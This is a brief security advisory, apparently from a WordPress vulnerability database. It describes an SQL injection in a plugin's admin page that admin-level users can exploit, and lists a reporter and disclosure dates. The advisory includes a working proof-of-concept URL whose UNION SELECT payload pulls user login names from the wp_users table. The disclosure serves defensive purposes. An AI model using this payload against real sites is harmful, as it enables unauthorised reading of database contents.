The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privileged users such as admin
As admin, open https://example.com/wp-admin/admin.php?page=wpcc_add_new&edit_row=-1+UNION+select+1,1,1,1,user_login,1,1,1,1,1,1,1,1,1,1,1+from+wp_users Select “Text Cursor”, and the user's name will be in the input field
Lana Codes
Lana Codes
Yes
2022-09-21 (about 8 months ago)
2022-09-21 (about 8 months ago)
2022-10-04 (about 7 months ago)